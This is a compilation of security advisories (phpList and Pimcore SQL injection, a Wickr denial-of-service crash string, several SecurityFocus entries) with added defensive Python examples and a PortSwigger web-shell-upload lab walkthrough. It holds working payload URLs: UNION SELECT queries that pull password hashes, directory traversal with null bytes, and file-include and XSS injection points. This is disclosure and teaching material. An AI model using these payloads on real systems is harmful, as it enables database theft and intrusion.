Document Title:
===============
PHPLIST v3.0.6 & v3.0.10 - SQL Injection Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1358
Release Date:
=============
2014-12-18
Vulnerability Laboratory ID (VL-ID):
====================================
1358
Common Vulnerability Scoring System:
====================================
6.1
Product & Service Introduction:
===============================
phpList is open source software for managing mailing lists. It is designed for the dissemination of information, such as newsletters, news
and advertising, to lists of subscribers. It is written in PHP and uses a MySQL database to store the information. phpList is free and open-source
software subject to the terms of the GNU General Public License (GPL). Most popular open source newsletter manager. Easy permission marketing.
Free to download, easy to install and integrate, versatile and extensible. Over 10,000 downloads a month.
(Copy of the Vendor Homepage: https://www.phplist.com/ )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a sql injection vulnerability in the official PHPList v3.0.6 & v3.0.10 web-application.
Vulnerability Disclosure Timeline:
==================================
2014-12-18: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
PHPList Limited
Product: PHPList - Web Application 3.0.6 - 3.0.10
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
A SQL injection web vulnerability has been discovered in the official PHPLIST v3.0.6 & v3.0.10 open source web-application.
The vulnerability allows an attacker to inject SQL commands through a vulnerable parameter value and compromise the application DBMS.
The SQL injection vulnerability is located in the subscriber ("abo") user search engine of the phpList application. Local privileged accounts
are able to inject their own SQL commands through the vulnerable findby value in the subscriber search module. A successful attack requires
manipulating a GET method request with the vulnerable findby value. The injection is a basic ORDER BY SQL injection that allows
compromise of the web-application.
The security risk of the SQL injection vulnerability is estimated as high with a CVSS (Common Vulnerability Scoring System) count of 6.1.
Exploitation of the application-side web vulnerability requires a low privileged web-application user account and no user interaction.
Successful exploitation of the security vulnerability results in web-application and database management system compromise.
Request Method(s):
[+] GET
Vulnerable Module(s):
[+] Abonnenten suchen > Abonnenten finden > Abonnenten finden (German UI: Search subscribers > Find subscribers > Find subscribers)
Vulnerable Parameter(s):
[+] findby
Proof of Concept (PoC):
=======================
The SQL injection web vulnerability can be exploited by remote attackers with a privileged application user account and without user interaction.
For security demonstration or to reproduce the security vulnerability, follow the provided information and steps below.
PoC: Abonnenten suchen > Abonnenten finden > Abonnenten finden (German UI: Search subscribers > Find subscribers > Find subscribers)
http://phplist.127.0.0.1:8080/lists/admin/?page=users&start=0&find=1&findby=-1'[SQL INJECTION VULNERABILITY!]--
--- SQL Error Session Logs ---
Database error 1064 while doing query
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ' '' at line 1
Database error 1064 while doing query
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near
'phplist_user_user.confirmed from phplist_user_user where limit 0,50' at line 1
-
Database error 1054 while doing query Unknown column '10' in 'order clause'
Database error 1064 while doing query You have an error in your SQL syntax;
check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1
Database error 1064 while doing query You have an error in your SQL syntax;
check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1
Database error 1064 while doing query You have an error in your SQL syntax;
check the manual that corresponds to your MySQL server version for the right syntax to use near
'phplist_user_user.confirmed from phplist_user_user where limit 0,50' at line 1
Reference(s):
http://phplist.127.0.0.1:8080/lists/
http://phplist.127.0.0.1:8080/lists/admin/
http://phplist.127.0.0.1:8080/lists/admin/?page=users&start=0
http://phplist.127.0.0.1:8080/lists/admin/?page=users&start=0&find=1&findby=1
Solution - Fix & Patch:
=======================
The vulnerability can be patched by restricting the findby parameter in the subscriber search module. Encode and parse the input values to prevent SQL injection attacks.
Use a prepared statement to secure the point where the application communicates with the local DBMS. Do not allow PHP code errors to become visible - error(0).
Security Risk:
==============
The security risk of the sql injection web vulnerability in the findby value of the abo user search module is estimated as high.
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright © 2014 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
Document Title:
===============
Pimcore v3.0 & v2.3.0 CMS - SQL Injection Vulnerability
References (Source):
====================
http://vulnerability-lab.com/get_content.php?id=1363
Release Date:
=============
2014-12-16
Vulnerability Laboratory ID (VL-ID):
====================================
1363
Common Vulnerability Scoring System:
====================================
6.4
Product & Service Introduction:
===============================
Pimcore is a powerful and robust Zend Framework based PHP content management system (CMS) for creating and managing digital
content and assets licensed under the open-source BSD license. Create outstanding digital experiences on the most flexible
content management platform available. Manage and edit any type of digital content, for any device and channel in a 100%
flexible and personalized way. Pimcore features award-winning single-source and multi-channel publishing functionality
making it easy to manage, update, and integrate content and data from various sources. With pimcore brands can create
and manage rich digital experiences for all of their output channels at once: web, mobile, apps, social platforms,
print and digital signage. With pimcore you can truly `edit once & reuse anywhere`.
(Copy of the Homepage: https://www.pimcore.org/ )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a sql injection vulnerability in the official Pimcore v3.0 & v2.3.0 Content Management System (Web-Application).
Vulnerability Disclosure Timeline:
==================================
2014-12-16: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Pimcore GmbH
Product: PimCore - Content Management System 3.0 Release Candidate & 2.3.0
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
A remote SQL injection web vulnerability has been discovered in the official Pimcore v3.0 & v2.3.0 Content Management System.
The vulnerability allows remote attackers and local privileged user accounts to inject their own SQL commands and compromise
the web-server DBMS of Pimcore.
The security vulnerability is located in the name value of the GET method request to the Pimcore mysql module. Remote attackers
and local privileged user accounts are able to compromise the application service by injecting malicious SQL commands. The request
method used to inject the code is GET, and the attack vector is on the application side of the module. Remote attackers are able to use the
inner application functions of the class module to perform an unauthorized execution on the application side through the admin ACP.
The security risk of the SQL vulnerability is estimated as high with a CVSS (Common Vulnerability Scoring System) count of 6.4.
Exploitation of the remote SQL injection web vulnerability requires no privileged application user account, or only a low privileged
user account, and no user interaction. Successful exploitation of the SQL injection vulnerability results in application and
web-service or DBMS compromise.
Request Method(s):
[+] GET
Vulnerable Module(s):
[+] backup/mysql
Vulnerable Parameter(s):
[+] name
Proof of Concept (PoC):
=======================
The SQL injection vulnerability can be exploited by remote attackers with a low privileged application user account and without user interaction.
For security demonstration or to reproduce the security vulnerability, follow the provided information and steps below.
PoC:
./backup/mysql?_dc=1415886023081&name=-1%27[SQL INJECTION VULNERABILITY!]--&type=BASE%20TABLE
--- PoC Session Logs [GET] ---
Status: 200[OK]
GET http://pimcore.localhost:8080/admin/backup/mysql?_dc=1415886023081&name=-1%27[SQL INJECTION VULNERABILITY!]--&type=BASE%20TABLE
Load Flags[VALIDATE_NEVER LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[495] Mime Type[text/html]
Request Header:
Host[pimcore.localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Cookie[__utma=59704236.87754243.1415885491.1415885491.1415885491.1;
__utmb=59704236.1.10.1415885491; __utmc=59704236;
__utmz=59704236.1415885491.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none);
pimcore_admin_sid=28vctg6ilpedepa26b81gqeps5]
Connection[keep-alive]
Response Header:
Date[Thu, 13 Nov 2014 13:55:50 GMT]
Server[Apache/2.2.22 (Debian)]
Set-Cookie[pimcore_admin_sid=28vctg6ilpedepa26b81gqeps5; path=/; HttpOnly]
Expires[Thu, 19 Nov 1981 08:52:00 GMT]
Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0]
Pragma[no-cache]
Connection[close]
Content-Encoding[gzip]
X-Powered-By[pimcore]
Content-Length[495]
Content-Type[text/html]
--- Error & Exception Logs ---
Fatal error: Uncaught exception 'Zend_Db_Statement_Mysqli_Exception' with message 'Mysqli prepare error:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-1'' at line 1'
in /home/pimcore-service/www/pimcore/lib/Zend/Db/Statement/Mysqli.php:77
-
Stack trace: #0 /home/pimcore-service/www/pimcore/lib/Zend/Db/Statement.php(115): Zend_Db_Statement_Mysqli->_prepare('SELECT * FROM -...')
#1 /home/pimcore-service/www/pimcore/lib/Zend/Db/Adapter/Mysqli.php(388): Zend_Db_Statement->__construct(Object(Zend_Db_Adapter_Mysqli), 'SELECT * FROM -...')
#2 /home/pimcore-service/www/pimcore/lib/Zend/Db/Adapter/Abstract.php(479): Zend_Db_Adapter_Mysqli->prepare('SELECT * FROM -...')
#3 /home/pimcore-service/www/pimcore/lib/Zend/Db/Adapter/Abstract.php(737): Zend_Db_Adapter_Abstract->query('SELECT * FROM -...', Array)
#4 [internal function]: Zend_Db_Adapter_Abstract->fetchAll('SELECT * FROM -...') #5 /home/pimcore-service/www/pimcore/lib/Pimcore/Resource/Wrapper.php(230):
call in /home/pimcore-service/www/pimcore/lib/Zend/Db/Statement/Mysqli.php on line 77
-
Fatal error: Call to a member function isAllowed() on a non-object in /home/pimcore-service/www/pimcore/lib/Pimcore/Controller/Action/Admin/Element.php on line 37
-
Fatal error: Uncaught exception 'Zend_Db_Statement_Mysqli_Exception' with message 'Mysqli prepare error:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-1'' at line 1'
in /home/pimcore-service/www/pimcore/lib/Zend/Db/Statement/Mysqli.php:77
-
Stack trace: #0 /home/pimcore-service/www/pimcore/lib/Zend/Db/Statement.php(115): Zend_Db_Statement_Mysqli->_prepare('SELECT * FROM -...')
#1 /home/pimcore-service/www/pimcore/lib/Zend/Db/Adapter/Mysqli.php(388): Zend_Db_Statement->__construct(Object(Zend_Db_Adapter_Mysqli), 'SELECT * FROM -...')
#2 /home/pimcore-service/www/pimcore/lib/Zend/Db/Adapter/Abstract.php(479): Zend_Db_Adapter_Mysqli->prepare('SELECT * FROM -...')
#3 /home/pimcore-service/www/pimcore/lib/Zend/Db/Adapter/Abstract.php(737): Zend_Db_Adapter_Abstract->query('SELECT * FROM -...', Array)
#4 [internal function]: Zend_Db_Adapter_Abstract->fetchAll('SELECT * FROM -...')
#5 /home/pimcore-service/www/pimcore/lib/Pimcore/Resource/Wrapper.php(230): call in /home/pimcore-service/www/pimcore/lib/Zend/Db/Statement/Mysqli.php on line 77
Solution - Fix & Patch:
=======================
The vulnerability can be patched by implementing two prepared statements in the section where the vulnerable name value is used.
Also encode and parse the qrcode and mysql GET method requests to prevent exploitation.
The fix for the backup routine is already in the main trunk and can be reviewed here:
https://github.com/pimcore/pimcore/commit/93067d865affa5a0110ae7e9904cbc5ff5868376
Note: The patch will be part of the next version (RC 2) and the final 3.0 release. You can also verify it by downloading the latest build from pimcore.org/download.
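Both advisories above recommend prepared statements, but the two injected values are SQL identifiers, not data: the phpList findby value selects the ORDER BY column (the log shows "Unknown column '10' in 'order clause'"), and the Pimcore name value is pasted straight into `SELECT * FROM ...` (visible in the stack trace). Statement parameters can only bind values, so identifiers must be resolved through an allow-list and the real name quoted server-side. The following is an added example in Python against an in-memory SQLite table, not code from phpList, Pimcore or Vulnerability Lab; the table contents, the `FINDBY_COLUMNS` map and the `BACKUP_TABLES` set are constructed for the illustration.

```python
import sqlite3
from typing import List, Tuple

# Constructed stand-in for the phplist_user_user table named in the phpList error
# logs above; the columns and rows are made up for this example.
SAMPLE_SCHEMA = """
CREATE TABLE phplist_user_user (
    id INTEGER PRIMARY KEY, email TEXT, confirmed INTEGER, entered TEXT);
INSERT INTO phplist_user_user VALUES (1, 'alice@example.org', 1, '2014-01-01');
INSERT INTO phplist_user_user VALUES (2, 'bob@example.org',   0, '2014-02-01');
INSERT INTO phplist_user_user VALUES (3, 'carol@example.org', 1, '2014-03-01');
"""

# Allow-list for the ORDER BY target: keys are the only values a client may send
# in ``findby``, values are the real column names. Nothing else is ever interpolated.
FINDBY_COLUMNS = {"id": "id", "email": "email", "confirmed": "confirmed", "entered": "entered"}

# Allow-list of tables a backup/export endpoint may be asked to dump (hypothetical set).
BACKUP_TABLES = frozenset({"phplist_user_user"})

PAGE_SIZE = 50  # the phpList logs above show "limit 0,50"


def quote_identifier(name: str) -> str:
    """Quote an identifier SQL-standard style (SQLite, PostgreSQL); MySQL uses backticks instead."""
    return '"' + name.replace('"', '""') + '"'


def build_user_search(findby: str, find: str, start: int) -> Tuple[str, List[object]]:
    """Return (sql, params) for a subscriber search.

    Column names cannot be bound as statement parameters, so ``findby`` is resolved
    through the allow-list; the search term and the offset are bound normally.
    """
    try:
        column = FINDBY_COLUMNS[findby]
    except KeyError:
        raise ValueError(f"findby not allowed: {findby!r}") from None
    if not isinstance(start, int) or start < 0:
        raise ValueError("start must be a non-negative integer")
    sql = (
        "SELECT id, email, confirmed FROM phplist_user_user "
        f"WHERE email LIKE ? ORDER BY {quote_identifier(column)} LIMIT ? OFFSET ?"
    )
    return sql, [f"%{find}%", PAGE_SIZE, start]


def build_table_dump(name: str) -> str:
    """Return the SELECT for dumping one table. The Pimcore trace above shows what
    happens when the raw ``name`` value is pasted into ``SELECT * FROM ...`` instead."""
    if name not in BACKUP_TABLES:
        raise ValueError(f"table not allowed: {name!r}")
    return f"SELECT * FROM {quote_identifier(name)}"


def run_search(findby: str, find: str = "", start: int = 0) -> List[tuple]:
    """Execute a search against an in-memory SQLite copy of the sample table."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SAMPLE_SCHEMA)
    sql, params = build_user_search(findby, find, start)
    return conn.execute(sql, params).fetchall()


if __name__ == "__main__":
    print(run_search("email"))
    for bad in ("-1'", "10", "id; DROP TABLE phplist_user_user"):
        try:
            build_user_search(bad, "", 0)
        except ValueError as err:
            print("rejected:", err)
```

The rejected value is never echoed into the query text, and the error message is meant for the application log, not the HTTP response, which is the other half of the "do not expose database errors" advice in the phpList fix section.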
Security Risk:
==============
The security risk of the sql injection web vulnerability in the pimcore content management system is estimated as high. (CVSS 6.4)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Document Title:
===============
Wickr Desktop v2.2.1 Windows - Denial of Service Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1377
Video:
http://www.vulnerability-lab.com/get_content.php?id=1388
Release Date:
=============
2014-12-25
Vulnerability Laboratory ID (VL-ID):
====================================
1377
Common Vulnerability Scoring System:
====================================
3.3
Product & Service Introduction:
===============================
Wickr (pronounced `wicker`) is a proprietary instant messenger for iPhone and Android. Wickr allows users to exchange end-to-end encrypted and
self-destructing messages, including photos and file attachments. The `self-destruct` part of the software is designed to use a `Secure File Shredder`
which the company says `forensically erases unwanted files you deleted from your device`. However the company uses a proprietary algorithm to manage
the data, a practice which is prone to error according to many security experts.
On January 15, 2014, Wickr announced it is offering a US$100,000 bug bounty for those who find vulnerabilities that significantly impact users. In addition,
a recipient can in general use other software and techniques like screen-capture capabilities or a separate camera to make permanent copies of the content.
(Copy of the Homepage: https://wickr.com/ )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a denial of service web vulnerability in the official Wickr Desktop v2.2.1 Windows software.
Vulnerability Disclosure Timeline:
==================================
2014-12-25: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Wickr Inc.
Product: Wickr - Desktop Software (Windows) 2.2.1
Exploitation Technique:
=======================
Local
Severity Level:
===============
Medium
Technical Details & Description:
================================
A local denial of service vulnerability has been discovered in the official Wickr TSM v2.2.1 (MSI) Windows software.
The issue allows local attackers to crash or shut down the software client by using specially crafted symbol payloads.
The Wickr v2.2.1 (MSI) software crashes with an unhandled exception in CFLite.dll via qsqlcipher_wickr.dll when it processes
specially crafted symbol strings supplied as a password or name. The issue occurs after the payload is entered into the `change name friend contacts`,
`wickr password auth` and `friends > add friends` input fields. Attackers are able to change the name value of their own profile (payload) to crash the
Wickr client. Local attackers can enter the payload into the input fields to crash/shut down the application with an unhandled exception.
The security risk of the denial of service vulnerability is estimated as medium with a CVSS (Common Vulnerability Scoring System) count of 3.3.
Exploitation of the DoS vulnerability requires a low privileged application user account and low user interaction. Successful exploitation of
the vulnerability results in an application crash or service shutdown.
Vulnerable Module(s):
[+] friend contacts
[+] wickr password auth
[+] friends
Vulnerable Input(s):
[+] add friends (name)
[+] wickr password auth
[+] change friend (update name)
Vulnerable Parameter(s):
[+] name (value input)
[+] password (value input)
Proof of Concept (PoC):
=======================
The denial of service web vulnerability can be exploited by remote attackers and local attackers with low user interaction.
For security demonstration or to reproduce the vulnerability, follow the provided information and steps below.
Manual steps to reproduce the vulnerability ...
1. Download Wickr v2.2.1 for Windows to your Windows 8 box (mywickr.info/download.php?p=4)
2. Install the Windows version of the Wickr software on your Windows 8 box
3. Create a new account and enter the payload into the password input field
Note: After the payload has been processed by the auth, the software crashes. You should attach a debugger beforehand.
4. Successful reproduction of the first issue!
5. We register a new account with regular values
6. Open the friends > add friends section and enter the payload into the search input value
Note: After the payload has been processed to add the friend, the software crashes. You should attach a debugger beforehand.
7. Successful reproduction of the second issue!
8. We open the software again and log in. Switch to the existing friend contacts and edit the profile
9. Enter the payload into the name values and save the settings
Note: After the payload has been processed to change the name, the software crashes. You should attach a debugger beforehand.
10. Successful reproduction of the third issue!
Payload: Denial of Service
็¬็ส็็็็็ -็็็็็็็็็็็็็็็็็็็็ส็¬็็็็็็็็¬็็็็็็็็็็็็็็็็ส็็็็¬็็็็็็็็็-็็็็็็็ ็็็็็ส็็็็็็็¬็็็็็็็็็็¬็็็็็็็็ส็็็็็็็็็็¬็็็็็็็็็็็ ¬็็็็ส็็็็็็็็็็็็็¬็็็็ ็็็็็็็็¬ส็็็็็็็็็็็็็็็็-็็็็็็็็็ส็็็็็็็็็็็็็็็็็็็ ¬็็็็็็ส็็็็็็็¬ส็็็็็็็็็็็็็็็็็็็็็็็็็ส็็็¬¬็็็็็็็็็็็็็็็็็็็็็็ส็็็็็็¬็
--- Error Report Logs ---
EventType=APPCRASH
EventTime=130628671359850105
ReportType=2
Consent=1
UploadTime=130628671360390638
ReportIdentifier=df89d941-8208-11e4-be8b-54bef733d5e7
IntegratorReportIdentifier=df89d940-8208-11e4-be8b-54bef733d5e7
WOW64=1
NsAppName=Wickr.exe
Response.BucketId=96ac0935c87e28d0d5f61ef072fd75b8
Response.BucketTable=1
Response.LegacyBucketId=73726044048
Response.type=4
Sig[0].Name=Anwendungsname
Sig[0].Value=Wickr.exe
Sig[1].Name=Anwendungsversion
Sig[1].Value=0.0.0.0
Sig[2].Name=Anwendungszeitstempel
Sig[2].Value=02849d78
Sig[3].Name=Fehlermodulname
Sig[3].Value=CFLite.dll
Sig[4].Name=Fehlermodulversion
Sig[4].Value=0.0.0.0
Sig[5].Name=Fehlermodulzeitstempel
Sig[5].Value=53f6c178
Sig[6].Name=Ausnahmecode
Sig[6].Value=c0000005
Sig[7].Name=Ausnahmeoffset
Sig[7].Value=00027966
DynamicSig[1].Name=Betriebsystemversion
DynamicSig[1].Value=6.3.9600.2.0.0.256.48
DynamicSig[2].Name=Gebietsschema-ID
DynamicSig[2].Value=1031
DynamicSig[22].Name=Zusatzinformation 1
DynamicSig[22].Value=5861
DynamicSig[23].Name=Zusatzinformation 2
DynamicSig[23].Value=5861822e1919d7c014bbb064c64908b2
DynamicSig[24].Name=Zusatzinformation 3
DynamicSig[24].Value=84a0
DynamicSig[25].Name=Zusatzinformation 4
DynamicSig[25].Value=84a09ea102a12ee665c500221db8c9d6
UI[2]=C:\Program Files (x86)\Wickr Inc\Wickr - Top Secret Messenger\Wickr.exe
UI[3]=Wickr.exe funktioniert nicht mehr
UI[4]=Windows kann online nach einer Lösung für das Problem suchen.
UI[5]=Online nach einer Lösung suchen und das Programm schließen
UI[6]=Später online nach einer Lösung suchen und das Programm schließen
UI[7]=Programm schließen
... ... ... ...
LoadedModule[103]=C:\Program Files (x86)\Wickr Inc\Wickr - Top Secret Messenger\sqldrivers\qsqlcipher_wickr.dll
State[0].Key=Transport.DoneStage1
State[0].Value=1
FriendlyEventName=Nicht mehr funktionsfähig
ConsentKey=APPCRASH
AppName=Wickr.exe
AppPath=C:\Program Files (x86)\Wickr Inc\Wickr - Top Secret Messenger\Wickr.exe
NsPartner=windows
NsGroup=windows8
ApplicationIdentity=6A5425CE651532265F599A5A86C6C2EE
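The Windows Error Reporting (WER) dump above is the artifact a responder actually gets from a crash like this: the Sig[N] parameters are positional APPCRASH bucketing fields (application name, application version, faulting module, exception code, exception offset), so they can be read without knowing the German labels, and exception code c0000005 is STATUS_ACCESS_VIOLATION. The following parser is an added example in Python, not part of the advisory or of Wickr; the `SAMPLE_REPORT` is a constructed excerpt of the report above, and the `SIG_FIELDS` index map reflects the standard APPCRASH parameter order.

```python
import re
from typing import Dict, List

# Constructed excerpt modelled on the Wickr APPCRASH report above; only the
# lines the parser cares about are included, with the original German labels.
SAMPLE_REPORT = """EventType=APPCRASH
NsAppName=Wickr.exe
Sig[0].Name=Anwendungsname
Sig[0].Value=Wickr.exe
Sig[1].Name=Anwendungsversion
Sig[1].Value=0.0.0.0
Sig[3].Name=Fehlermodulname
Sig[3].Value=CFLite.dll
Sig[6].Name=Ausnahmecode
Sig[6].Value=c0000005
Sig[7].Name=Ausnahmeoffset
Sig[7].Value=00027966
DynamicSig[1].Name=Betriebsystemversion
DynamicSig[1].Value=6.3.9600.2.0.0.256.48
... ... ... ...
LoadedModule[103]=C:\\Program Files (x86)\\Wickr Inc\\Wickr - Top Secret Messenger\\sqldrivers\\qsqlcipher_wickr.dll
"""

# APPCRASH bucketing parameters are positional, which makes the index
# language-independent even though the Name fields are localised.
SIG_FIELDS = {
    0: "app_name", 1: "app_version", 2: "app_timestamp",
    3: "fault_module", 4: "fault_module_version", 5: "fault_module_timestamp",
    6: "exception_code", 7: "exception_offset",
}
STATUS_ACCESS_VIOLATION = 0xC0000005

_SIG_RE = re.compile(r"^Sig\[(\d+)\]\.(Name|Value)=(.*)$")
_MODULE_RE = re.compile(r"^LoadedModule\[\d+\]=(.*)$")


def parse_wer_report(text: str) -> Dict[str, object]:
    """Split a WER text report into Sig[] pairs, loaded modules and plain key=value fields."""
    report: Dict[str, object] = {"sig": {}, "loaded_modules": [], "fields": {}}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("..."):  # elided region in the advisory
            continue
        m = _SIG_RE.match(line)
        if m:
            idx, kind, value = int(m.group(1)), m.group(2).lower(), m.group(3)
            report["sig"].setdefault(idx, {})[kind] = value
            continue
        m = _MODULE_RE.match(line)
        if m:
            report["loaded_modules"].append(m.group(1))
            continue
        if "=" in line:
            key, value = line.split("=", 1)
            report["fields"][key] = value
    return report


def triage(report: Dict[str, object]) -> Dict[str, object]:
    """Reduce a parsed report to the fields a responder wants first."""
    sig = report["sig"]
    out: Dict[str, object] = {name: sig.get(i, {}).get("value") for i, name in SIG_FIELDS.items()}
    code = out["exception_code"]
    out["exception_code_int"] = int(code, 16) if code else None
    out["is_access_violation"] = out["exception_code_int"] == STATUS_ACCESS_VIOLATION
    out["event_type"] = report["fields"].get("EventType")
    # Module basenames only; the full paths are kept in the parsed report.
    out["loaded_module_names"] = [p.rsplit("\\", 1)[-1] for p in report["loaded_modules"]]
    return out


if __name__ == "__main__":
    summary = triage(parse_wer_report(SAMPLE_REPORT))
    for key in ("event_type", "app_name", "fault_module", "exception_code", "exception_offset", "is_access_violation"):
        print(f"{key:20} {summary[key]}")
```

An access violation in a parsing path reached from user-controlled text is worth escalating beyond "the client crashes": the triage output gives the module and offset to hand to whoever owns the binary, which is what the debugger note in the steps above is asking for.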
Security Risk:
==============
The security risk of the denial of service web vulnerability in the wickr windows client software is estimated as medium. (CVSS 3.3)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
source: https://www.securityfocus.com/bid/47390/info
Technicolor THOMSON TG585v7 Wireless Router is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
Attackers may exploit this issue by enticing victims into visiting a malicious site.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected device. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Firmware versions prior to 8.2.7.6 are vulnerable.
http://www.example.com/cgi/b/ic/connect/?url=[XSS]
source: https://www.securityfocus.com/bid/47394/info
4images is prone to multiple remote file-include vulnerabilities and an SQL-injection vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit these vulnerabilities to execute arbitrary server-side script code on an affected computer in the context of the webserver process or compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or bypass the authentication control.
4images 1.7.9 is vulnerable; other versions may also be affected.
http://www.example.com/[path]/download.php?file_path=[Ev!l-Sh3ll]
http://www.example.com/[path]/categories.php?upload_url=[Ev!l-Sh3ll]
http://www.example.com/[path]/global.php?config=[Ev!l-Sh3ll]
http://www.example.com/[path]/details.php?cat_id_sql=0+AND+2=1
source: https://www.securityfocus.com/bid/47389/info
PhoenixCMS is prone to a local file-include vulnerability and an SQL-injection vulnerability.
An attacker can exploit the local file-include vulnerability using directory-traversal strings to view and execute arbitrary local files within the context of the webserver process.
The attacker can exploit the SQL-injection vulnerability to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
PhoenixCMS 1.7.0 is vulnerable; other versions may also be affected.
http://www.example.com/[path]/modules.php?name=Work_Probe&file=../../WS_FTP.LOG%00
http://www.example.com/[path]/modules.php?name=News&file=../../WS_FTP.LOG%00
http://www.example.com/modules.php?name=Surveys&op=results&pollID=3+and+1=2+union+select+1,version(),3,4,5--
source: https://www.securityfocus.com/bid/47388/info
The RunCMS 'partners' module is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/[path]/modules/partners/index.php?op=visit_partner&id=1+and+2=0+union+select+1,2,pass,4,5,pwdsalt,7,8,9,10+from+runcms_users+where+uid=2
source: https://www.securityfocus.com/bid/47375/info
Qianbo Enterprise Web Site Management System is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/en/Search.Asp?Range=Product&Keyword=[xss]
In this post we are going to solve the PortSwigger lab "Web shell upload via obfuscated file extension".

To solve the lab we have to upload a PHP file that reads and shows us the contents of the file /home/carlos/secret, since to prove that we have completed the lab we must submit the contents of this file.
In addition, the server is configured not to accept certain extensions.
In this case, the lab itself provides us with an account to log in with, so let's do that:

Once we have logged in, we land on the account's profile:

Once on the profile, as we can see, there is a file upload field for updating our account's avatar. Let's try to take advantage of this to upload the following file:

First of all, let's set up Burp Suite to intercept requests:

Once that part is configured, we upload the file:

Burp Suite will intercept the upload request:

To work more comfortably with the upload process, let's send the request to Repeater by pressing Ctrl+R:

As we can see, in this case, when we click Send, the server's response tells us that only JPG and PNG files are allowed.
So the idea is to use a double extension together with a null byte to see if we can bypass this restriction:

On sending the request, we see in the response that the file has been uploaded, and not only that: thanks to the null byte, we have got rid of the second extension we had appended (.jpg). With that done, let's look at the response in the browser:

We are no longer going to use Burp Suite, so we disable the proxy:

Once it is disabled, we go back to our profile:

As we can see, the avatar has been set; however, it seems that an error occurred while loading the image. Probably because the page tries to load our PHP file as if it were an image and therefore fails. Let's access the direct path of "the image" by right-clicking on it:

It seems to give us a problem; however, if we look at the URL, it is trying to load the file readSecret.php%00.jpg, when in fact the resulting file was readSecret.php. So we change the URL to access the latter file:

And in this way we reach the PHP code, it is interpreted, and we get to read the secret file.
